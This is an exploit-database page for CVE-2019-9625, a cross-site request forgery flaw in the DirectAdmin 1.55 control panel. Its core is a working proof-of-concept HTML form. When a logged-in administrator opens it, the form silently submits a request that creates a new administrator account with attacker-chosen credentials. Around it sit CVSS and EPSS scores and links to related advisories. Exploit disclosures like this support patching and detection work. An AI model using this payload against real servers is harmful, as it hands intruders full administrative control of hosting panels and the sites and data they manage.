Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtManhNho1337DAY-ID-32333
HistoryMar 10, 2019 - 12:00 a.m.

DirectAdmin 1.55 - CMD_ACCOUNT_ADMIN Cross-Site Request Forgery Vulnerability

2019-03-1000:00:00
ManhNho
0day.today
175

0.002 Low

EPSS

Percentile

60.9%

JSON

Exploit for php platform in category web applications

# Exploit title: DirectAdmin v1.55 - CSRF via CMD_ACCOUNT_ADMIN Admin Panel
# Exploit Author: ManhNho
# Vendor Homepage: https://www.directadmin.com/
# Software Link: https://www.directadmin.com/
# Demo Link: https://www.directadmin.com:2222/CMD_ACCOUNT_ADMIN
# Version: 1.55
# CVE: CVE-2019-9625
# Tested on: Windows 10 / Kali Linux
# Category: Webapps


#1. Description
-----------------------------------------------------
DirectAdmin v 1.55 have CSRF via CMD_ACCOUNT_ADMIN Admin Panel lead to
create new admin account

#2. PoC
-----------------------------------------------------
a) Send below crafted request to logged in user who is having admin
Administrator level access

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://server:2222/CMD_ACCOUNT_ADMIN" method="POST">
      <input type="hidden" name="fakeusernameremembered" value="" />
      <input type="hidden" name="fakepasswordremembered" value="" />
      <input type="hidden" name="action" value="create" />
      <input type="hidden" name="username" value="attacker" />
      <input type="hidden" name="email" value="attacker&#64;mail&#46;com" />
      <input type="hidden" name="passwd" value="123456" />
      <input type="hidden" name="passwd2" value="123456" />
      <input type="hidden" name="notify" value="yes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


b) Once the logged in user opens the URL the form will get submitted
with active session of  administrator and action get performed
successfully.

#3. References

-----------------------------------------------------


https://github.com/ManhNho/CVEs/blob/master/New-Requests/DirectAdmin-CSRF

https://nvd.nist.gov/vuln/detail/CVE-2019-9625

#  0day.today [2019-03-10]  #

Related

cvelist 1
nvd 1
cve 1
packetstorm 1
exploitpack 1
prion 1
exploitdb 1
cvelist
cvelist
CVE-2019-9625
2019-03-07 15:00:00
nvd
nvd
CVE-2019-9625
2019-03-07 15:29:00
cve
cve
CVE-2019-9625
2019-03-07 15:29:00
packetstorm
packetstorm
DirectAdmin 1.55 Cross Site Request Forgery
2019-03-08 00:00:00
exploitpack
exploitpack
DirectAdmin 1.55 - CMD_ACCOUNT_ADMIN Cross-Site Request Forgery
2019-03-08 00:00:00
prion
prion
Cross site request forgery (csrf)
2019-03-07 15:29:00
exploitdb
exploitdb
DirectAdmin 1.55 - &#039;CMD_ACCOUNT_ADMIN&#039; Cross-Site Request Forgery
2019-03-08 00:00:00

0.002 Low

EPSS

Percentile

60.9%

JSON
Related for 1337DAY-ID-32333
cvelist1nvd1cve1packetstorm1exploitpack1prion1exploitdb1